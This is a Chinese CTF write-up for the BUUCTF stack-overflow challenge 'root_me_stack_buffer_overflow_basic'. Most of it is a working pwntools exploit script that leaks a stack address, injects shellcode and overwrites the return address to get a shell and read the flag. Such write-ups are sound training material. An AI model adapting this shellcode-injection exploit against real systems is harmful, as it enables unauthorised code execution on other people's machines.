[BUUCTF] root_me_stack_buffer_overflow_basic
root_me_stack_buffer_overflow_basic#
总结#
基础的ret2shellcode的题目,直接用pwntools生成shellcode即可。
EXP#
#!/usr/bin/python3
# -*- encoding: utf-8 -*-
# author: roderick
from pwncli import *
context.binary = "./root_me_stack_buffer_overflow_basic"
context.log_level = "debug"
io = remote("node4.buuoj.cn", 29064)
sh = shellcraft.sh()
data = "aaaa"
io.sendlineafter("Give me data to dump:\n", data)
m = io.recvline()
log_ex(f"Get msg: {m}")
stack_addr = int16_ex(m[:10])
log_address("stack_addr", stack_addr)
io.sendlineafter("Dump again (y/n):\n", "y")
data = flat({
0:asm(sh),
164: stack_addr
})
io.sendlineafter("Give me data to dump:\n", data)
io.sendlineafter("Dump again (y/n):\n", "n")
io.sendline("cat flag")
io.interactive()
引用与参考#
1、My Blog
2、Ctf Wiki
3、pwncli
作者:roderick
出处:https://www.cnblogs.com/LynneHuan/p/16104075.html
版权:本作品采用「署名-非商业性使用-相同方式共享 4.0 国际」许可协议进行许可。
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· winform 绘制太阳,地球,月球 运作规律
· AI与.NET技术实操系列(五):向量存储与相似性搜索在 .NET 中的实现
· 超详细:普通电脑也行Windows部署deepseek R1训练数据并当服务器共享给他人
· 上周热点回顾(3.3-3.9)
· AI 智能体引爆开源社区「GitHub 热点速览」
2021-04-05 pwn题命令行解题脚本
2021-04-05 ycb_2020_babypwn